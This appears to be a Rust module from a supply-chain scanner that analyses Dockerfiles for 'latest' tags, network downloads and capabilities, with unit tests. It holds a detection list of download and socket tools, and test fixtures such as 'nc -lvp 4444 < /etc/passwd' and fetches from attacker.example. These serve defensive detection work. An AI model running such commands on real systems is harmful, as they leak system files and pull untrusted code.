use crate::artifact_graph::{ArtifactCapability, ArtifactCapabilityFact, ArtifactRelation};
use crate::findings::{
ArtifactKind, EvidenceKind, Finding, MatchTarget, RecommendedAction, Severity, ThreatCategory,
};
use crate::services::artifact_orchestration::{ArtifactLink, ArtifactOrchestratorService};
use std::path::Path;
use crate::services::artifact_orchestration::manifests::strip_inline_hash_comment;
/// Lower-case command fragments that mark a Dockerfile line as fetching
/// something over the network.
///
/// Every entry is matched with `token_with_boundary` against a line that has
/// already been ASCII-lowercased, so entries must be lower-case themselves.
/// The leading space in `" nc"` is deliberate: `token_with_boundary` treats a
/// token that starts with a space as carrying its own left boundary.
const DOCKERFILE_NETWORK_DOWNLOAD_TOKENS: &[&str] = &[
    // Stand-alone download / socket tools.
    "curl",
    "wget",
    "invoke-webrequest",
    "ncat",
    " nc",
    "fetch",
    // Interpreter one-liners that pull in an HTTP client.
    "python -m urllib",
    "python -m http",
    "python -c \"import urllib",
    "python -c 'import urllib",
    "perl -mlwp",
];
pub(crate) fn analyze_dockerfile(path: &Path, content: &str) -> Vec<Finding> {
let artifact_path = path.display().to_string();
let mut findings = Vec::new();
for line in content.lines().map(str::trim) {
let lower_line = line.to_ascii_lowercase();
if lower_line.starts_with("from ") && is_latest_tag(&lower_line) {
findings.push(
Finding::builder("MANIFEST_DOCKER_LATEST_TAG", ThreatCategory::SupplyChain)
.severity(Severity::Low)
.action(RecommendedAction::RequireApproval)
.evidence_kind(EvidenceKind::Context)
.matched_on(MatchTarget::ReferencedFile {
path: artifact_path.clone(),
})
.artifact(ArtifactKind::PackageManifest, Some(artifact_path.clone()))
.match_value(line)
.reason("Docker base image uses the mutable latest tag")
.build(),
);
}
}
findings
}
/// Derives capability facts from the instructions found in Dockerfile text.
///
/// Each line is left-trimmed, passed through `strip_inline_hash_comment`, and
/// ASCII-lowercased before it is inspected. The returned facts, in this order
/// and each at most once, are:
///
/// 1. declared `NetworkAccess` - an `EXPOSE` instruction is present;
/// 2. observed `NetworkAccess` - a line contains one of
///    `DOCKERFILE_NETWORK_DOWNLOAD_TOKENS`, or an `ADD` line mentions an
///    `http://` / `https://` URL;
/// 3. declared `ProcessExecution` - a `RUN` instruction is present;
/// 4. declared `FilesystemWrite` - a `COPY` or `ADD` instruction is present.
pub(crate) fn dockerfile_capabilities(content: &str) -> Vec<ArtifactCapabilityFact> {
    let mut exposes_port = false;
    let mut runs_command = false;
    let mut copies_files = false;
    let mut downloads = false;

    for raw_line in content.lines() {
        let instruction = strip_inline_hash_comment(raw_line.trim_start()).to_ascii_lowercase();
        let is_add = instruction.starts_with("add ");

        // `||` short-circuits, so a flag that is already set skips its checks.
        exposes_port = exposes_port
            || instruction.starts_with("expose ")
            || instruction.trim_end() == "expose";
        runs_command = runs_command || instruction.starts_with("run ");
        copies_files = copies_files || instruction.starts_with("copy ") || is_add;
        downloads = downloads
            || DOCKERFILE_NETWORK_DOWNLOAD_TOKENS
                .iter()
                .any(|token| token_with_boundary(&instruction, token))
            || (is_add && (instruction.contains("http://") || instruction.contains("https://")));
    }

    // `bool::then` builds a fact only when its flag is set; extending with the
    // resulting `Option` appends zero or one element and keeps the order fixed.
    let mut facts = Vec::new();
    facts.extend(exposes_port.then(|| {
        ArtifactOrchestratorService::declared_capability(ArtifactCapability::NetworkAccess)
    }));
    facts.extend(downloads.then(|| {
        ArtifactOrchestratorService::observed_capability(ArtifactCapability::NetworkAccess)
    }));
    facts.extend(runs_command.then(|| {
        ArtifactOrchestratorService::declared_capability(ArtifactCapability::ProcessExecution)
    }));
    facts.extend(copies_files.then(|| {
        ArtifactOrchestratorService::declared_capability(ArtifactCapability::FilesystemWrite)
    }));
    facts
}
/// Extracts artifact links from Dockerfile text.
///
/// Each line is trimmed and passed through `strip_inline_hash_comment` before
/// inspection. Two kinds of link are produced, in source order:
///
/// * `Loads` - one per `FROM` instruction, targeting the image reference only.
///   `FROM` has the shape `FROM [--platform=<p>] <image> [AS <name>]`, so leading
///   `--flag` words and the trailing stage alias are not part of the target. A
///   `FROM` with no image word yields no link rather than an empty target.
/// * `Downloads` - at most one per line, targeting `"remote-resource"`, when the
///   line contains one of `DOCKERFILE_NETWORK_DOWNLOAD_TOKENS` or is an `ADD`
///   instruction mentioning an `http://` / `https://` URL. The `ADD` rule matches
///   what `dockerfile_capabilities` treats as an observed network download.
pub(crate) fn dockerfile_relations(content: &str) -> Vec<ArtifactLink> {
    let mut links = Vec::new();
    for line in content.lines().map(str::trim) {
        let code = strip_inline_hash_comment(line);
        let lower = code.to_ascii_lowercase();

        if lower.starts_with("from ") {
            // Word 0 is the `FROM` keyword itself; the image is the first
            // following word that is not a `--option`.
            let image = code
                .split_whitespace()
                .skip(1)
                .find(|word| !word.starts_with("--"));
            if let Some(image) = image {
                links.push(ArtifactLink {
                    target: image.to_string(),
                    relation: ArtifactRelation::Loads,
                });
            }
        }

        let adds_remote_url = lower.starts_with("add ")
            && (lower.contains("http://") || lower.contains("https://"));
        let runs_download_tool = DOCKERFILE_NETWORK_DOWNLOAD_TOKENS
            .iter()
            .any(|token| token_with_boundary(&lower, token));
        if adds_remote_url || runs_download_tool {
            links.push(ArtifactLink {
                target: "remote-resource".to_string(),
                relation: ArtifactRelation::Downloads,
            });
        }
    }
    links
}
/// Reports whether an already lower-cased line references an image by the
/// literal tag `latest`.
///
/// An occurrence of `:latest` counts only when the tag ends right there: it is
/// followed by end of input, a space, a tab, `#`, or a newline. Longer tags such
/// as `:latest-slim` and digest-pinned references such as `:latest@sha256:...`
/// therefore do not match.
fn is_latest_tag(lower_line: &str) -> bool {
    lower_line
        .split(":latest")
        // The first segment is the text *before* the first `:latest`; it is not
        // a suffix and must not be tested as one. With no occurrence at all it
        // is the only segment, so the result is `false`.
        .skip(1)
        .any(|after| matches!(after.chars().next(), None | Some(' ' | '\t' | '#' | '\n')))
}
/// Reports whether `token` occurs in `lower_line` as a stand-alone word rather
/// than as part of a longer identifier.
///
/// Both arguments are expected to be lower-case already; no case folding is
/// done here.
///
/// An occurrence counts when both sides are boundaries:
///
/// * left - start of line, or the preceding byte is a space, tab, `|`, `;`,
///   `&`, `(`, `"`, `'` or a backtick. A token that itself starts with a space
///   carries its own left boundary.
/// * right - end of line, or the next character is a space, tab, `|`, `;`, `&`,
///   `>`, `.`, `:`, `)`, `"`, `'` or a backtick.
///
/// The quote, parenthesis and backtick boundaries let commands wrapped by the
/// shell or written in exec form match, e.g. `sh -c "curl ..."`, `$(curl ...)`
/// and `["wget", "..."]`.
///
/// An empty `token` never matches.
fn token_with_boundary(lower_line: &str, token: &str) -> bool {
    // Width of the token's first character: the distance to advance after a
    // rejected occurrence. An empty token has none; `find("")` would succeed at
    // every position without making progress, so bail out early.
    let step = match token.chars().next() {
        Some(first) => first.len_utf8(),
        None => return false,
    };
    let is_left_boundary =
        |byte: u8| matches!(byte, b' ' | b'\t' | b'|' | b';' | b'&' | b'(' | b'"' | b'\'' | b'`');
    let is_right_boundary = |ch: char| {
        matches!(
            ch,
            ' ' | '\t' | '|' | ';' | '&' | '>' | '.' | ':' | ')' | '"' | '\'' | '`'
        )
    };

    let bytes = lower_line.as_bytes();
    let mut start = 0;
    while let Some(pos) = lower_line[start..].find(token) {
        let abs_pos = start + pos;
        let token_end = abs_pos + token.len();

        let left_ok =
            token.starts_with(' ') || abs_pos == 0 || is_left_boundary(bytes[abs_pos - 1]);
        let right_ok = lower_line[token_end..]
            .chars()
            .next()
            .map_or(true, is_right_boundary);
        if left_ok && right_ok {
            return true;
        }

        // Resume one character past the start of this occurrence, not past its
        // end, so an overlapping occurrence is still examined. `abs_pos` is a
        // match position and `step` is the width of the character found there,
        // so `start` stays on a character boundary.
        start = abs_pos + step;
    }
    false
}
#[cfg(test)]
mod tests {
    use super::*;

    /// True when any fact in `caps` reports `wanted`, whatever its source.
    fn reports_capability(caps: &[ArtifactCapabilityFact], wanted: ArtifactCapability) -> bool {
        caps.iter().any(|fact| fact.capability == wanted)
    }

    /// True when `caps` holds a `NetworkAccess` fact whose source is `Observed`.
    fn reports_observed_network(caps: &[ArtifactCapabilityFact]) -> bool {
        caps.iter().any(|fact| {
            fact.capability == ArtifactCapability::NetworkAccess
                && fact.source == crate::artifact_graph::ArtifactCapabilitySource::Observed
        })
    }

    /// True when at least one link carries the `Downloads` relation.
    fn has_download_edge(links: &[ArtifactLink]) -> bool {
        links
            .iter()
            .any(|link| matches!(link.relation, ArtifactRelation::Downloads))
    }

    /// True when at least one link points at the `"remote-resource"` target.
    fn targets_remote_resource(links: &[ArtifactLink]) -> bool {
        links.iter().any(|link| link.target == "remote-resource")
    }

    // ---- inline-comment handling -------------------------------------------

    #[test]
    fn dockerfile_capabilities_skips_curl_in_inline_comment() {
        let caps =
            dockerfile_capabilities("FROM alpine:3\nRUN echo ok # was: curl https://old\n");
        assert!(!reports_capability(
            &caps,
            ArtifactCapability::NetworkAccess
        ));
    }

    #[test]
    fn dockerfile_capabilities_detects_real_curl_with_trailing_comment() {
        let caps = dockerfile_capabilities("FROM alpine:3\nRUN curl https://x # bootstrap\n");
        assert!(reports_capability(&caps, ArtifactCapability::NetworkAccess));
    }

    #[test]
    fn dockerfile_relations_skips_curl_in_inline_comment() {
        let links = dockerfile_relations("FROM alpine:3\nRUN echo ok # was: curl https://gone\n");
        assert!(
            !targets_remote_resource(&links),
            "no Downloads link should be created from an inline-comment curl; got {links:?}",
        );
    }

    #[test]
    fn dockerfile_relations_detects_real_curl_with_trailing_comment() {
        let links = dockerfile_relations("FROM alpine:3\nRUN curl https://x # bootstrap\n");
        assert!(
            targets_remote_resource(&links),
            "real curl invocation should produce a Downloads link; got {links:?}",
        );
    }

    // ---- capability detection ----------------------------------------------

    #[test]
    fn dockerfile_capabilities_detects_python_urllib_download() {
        let caps = dockerfile_capabilities(
            "FROM python:3.11-slim\nRUN python -m urllib.request https://x/payload\n",
        );
        assert!(
            reports_observed_network(&caps),
            "python -m urllib must flip observed NetworkAccess; got {caps:?}",
        );
    }

    #[test]
    fn dockerfile_capabilities_detects_fetch_and_netcat() {
        for content in [
            "FROM alpine\nRUN fetch -o /tmp/x https://internal/payload\n",
            "FROM alpine\nRUN nc -lvp 4444 > /tmp/x\n",
        ] {
            let caps = dockerfile_capabilities(content);
            assert!(
                reports_observed_network(&caps),
                "expected observed NetworkAccess for {content:?}; got {caps:?}",
            );
        }
    }

    #[test]
    fn dockerfile_capabilities_does_not_overmatch_substrings_of_nc() {
        let caps = dockerfile_capabilities("FROM alpine\nRUN apk add func unc vncserver\n");
        assert!(
            !reports_observed_network(&caps),
            "substrings like func/unc/vncserver must not trip observed NetworkAccess; got {caps:?}",
        );
    }

    // ---- relation detection ------------------------------------------------

    #[test]
    fn dockerfile_relations_records_download_edge_for_python_urllib() {
        let links = dockerfile_relations(
            "FROM alpine\nRUN python -m urllib https://attacker.example/x.py\n",
        );
        let found = links.iter().any(|link| {
            matches!(link.relation, ArtifactRelation::Downloads) && link.target == "remote-resource"
        });
        assert!(
            found,
            "python -m urllib must produce a Downloads edge; got {links:?}",
        );
    }

    #[test]
    fn dockerfile_relations_records_download_edge_for_alternate_tools() {
        for token in [
            "RUN nc -lvp 4444 < /etc/passwd\n",
            "RUN ncat attacker.example 4444\n",
            "RUN fetch https://attacker.example/x\n",
            "RUN perl -MLWP::Simple -e 'getstore(...)'\n",
        ] {
            let links = dockerfile_relations(&format!("FROM alpine\n{token}"));
            assert!(
                has_download_edge(&links),
                "token line `{token}` must produce a Downloads edge; got {links:?}",
            );
        }
    }

    #[test]
    fn dockerfile_relations_still_records_curl_and_wget() {
        for token in ["RUN curl https://x\n", "RUN wget https://x\n"] {
            let links = dockerfile_relations(&format!("FROM alpine\n{token}"));
            assert!(
                has_download_edge(&links),
                "`{token}` must keep producing a Downloads edge; got {links:?}",
            );
        }
    }

    #[test]
    fn dockerfile_relations_does_not_overmatch_substrings() {
        for line in ["RUN prefetch npm package", "RUN apk add func unc vncserver"] {
            let links = dockerfile_relations(&format!("FROM alpine\n{line}\n"));
            assert!(
                !has_download_edge(&links),
                "substring in `{line}` must not produce a Downloads edge; got {links:?}",
            );
        }
    }
}